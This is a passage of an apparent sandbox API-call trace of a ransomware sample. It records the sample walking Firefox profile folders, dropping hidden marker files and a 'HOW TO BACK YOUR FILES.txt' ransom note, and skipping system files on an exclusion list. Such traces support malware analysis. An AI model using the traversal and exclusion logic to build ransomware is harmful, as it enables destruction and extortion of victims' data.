ftLastWriteTime.dwLowDateTime=0x83c065c8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0051.563] FindClose (in: hFindFile=0xc72ec8 | out: hFindFile=0xc72ec8) returned 1 [0051.563] lstrcpyW (in: lpString1=0x30aeb68, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.563] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\saved-telemetry-pings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.564] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0051.564] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.564] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.564] CloseHandle (hObject=0x260) returned 1 [0051.564] CloseHandle (hObject=0x2ac) returned 1 [0051.564] GetCurrentThreadId () returned 0xfa8 [0051.564] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66348 [0051.564] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps" [0051.564] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc87ad8 | out: hHeap=0xc50000) returned 1 [0051.564] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66340 | out: hHeap=0xc50000) returned 1 [0051.564] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps" [0051.564] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps\\" [0051.564] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps\\.BFC0E91B00AE8A0620D3" [0051.564] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\minidumps\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.565] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.568] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.569] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.569] CloseHandle (hObject=0x2ac) returned 1 [0051.570] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps") returned 83 [0051.570] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.570] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x83c065c8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0051.570] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.570] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.570] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.570] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.570] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x83c065c8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.570] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.570] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.570] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.570] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.570] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.570] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83c065c8, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83c065c8, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83c065c8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.570] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.570] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.570] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83c065c8, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83c065c8, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83c065c8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0051.570] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0051.570] lstrcpyW (in: lpString1=0x30aeb50, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.570] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\minidumps\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.571] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0051.571] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.571] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.571] CloseHandle (hObject=0x260) returned 1 [0051.571] CloseHandle (hObject=0x2ac) returned 1 [0051.571] GetCurrentThreadId () returned 0xfa8 [0051.571] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66628 [0051.571] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm" [0051.571] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5fd10 | out: hHeap=0xc50000) returned 1 [0051.571] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66620 | out: hHeap=0xc50000) returned 1 [0051.571] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm" [0051.571] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\" [0051.571] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\.BFC0E91B00AE8A0620D3" [0051.571] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.572] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.575] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.575] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.576] CloseHandle (hObject=0x2ac) returned 1 [0051.576] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm") returned 89 [0051.576] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.576] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5af7cc2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x5af7cc2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x83c2c591, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0051.576] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.576] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.576] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.576] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.576] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5af7cc2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x5af7cc2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x83c2c591, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.576] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.576] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.576] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.576] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.577] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.577] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83c2c591, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83c2c591, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83c2c591, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.577] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.577] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.577] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5af7cc2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x5af7cc2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x5b71e56, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1.4.8.903", cAlternateFileName="148~1.903")) returned 1 [0051.577] lstrcmpiW (lpString1="1.4.8.903", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.577] lstrcmpiW (lpString1="1.4.8.903", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.577] lstrcmpiW (lpString1="1.4.8.903", lpString2="Tiger4444.exe") returned -1 [0051.577] lstrcmpiW (lpString1="1.4.8.903", lpString2=".") returned 1 [0051.577] lstrcmpiW (lpString1="1.4.8.903", lpString2="..") returned 1 [0051.577] lstrcmpiW (lpString1="1.4.8.903", lpString2="windows") returned -1 [0051.577] lstrcmpiW (lpString1="1.4.8.903", lpString2="bootmgr") returned -1 [0051.577] lstrcmpiW (lpString1="1.4.8.903", lpString2="pagefile.sys") returned -1 [0051.577] lstrcmpiW (lpString1="1.4.8.903", lpString2="boot") returned -1 [0051.577] lstrcmpiW (lpString1="1.4.8.903", lpString2="ids.txt") returned -1 [0051.577] lstrcmpiW (lpString1="1.4.8.903", lpString2="NTUSER.DAT") returned -1 [0051.577] lstrcpyW (in: lpString1=0x30aeb5c, lpString2="1.4.8.903" | out: lpString1="1.4.8.903") returned="1.4.8.903" [0051.577] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903" [0051.577] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\" [0051.577] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\.BFC0E91B00AE8A0620D3" [0051.577] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.585] WriteFile (in: hFile=0x260, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.588] FlushFileBuffers (hFile=0x260) returned 1 [0051.589] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.589] CloseHandle (hObject=0x260) returned 1 [0051.589] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66340 [0051.589] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc8) returned 0xc8db20 [0051.589] RtlInterlockedPushEntrySList (in: ListHead=0xc66808, ListEntry=0xc66348 | out: ListHead=0xc66808, ListEntry=0xc66348) returned 0x0 [0051.589] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5af7cc2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x5af7cc2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x5b71e56, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1.4.8.903", cAlternateFileName="148~1.903")) returned 0 [0051.590] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0051.590] lstrcpyW (in: lpString1=0x30aeb5c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.590] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.591] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0051.591] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.592] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.592] CloseHandle (hObject=0x260) returned 1 [0051.592] CloseHandle (hObject=0x2ac) returned 1 [0051.592] GetCurrentThreadId () returned 0xfa8 [0051.592] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66608 [0051.592] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264" [0051.592] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5f6a8 | out: hHeap=0xc50000) returned 1 [0051.592] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66600 | out: hHeap=0xc50000) returned 1 [0051.592] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264" [0051.592] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\" [0051.592] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\.BFC0E91B00AE8A0620D3" [0051.592] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-gmpopenh264\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.593] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.596] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.597] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.597] CloseHandle (hObject=0x2ac) returned 1 [0051.597] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264") returned 89 [0051.597] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.597] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40c4b15, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x40c5e7c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x83c52611, ftLastWriteTime.dwHighDateTime=0x1d50d44, 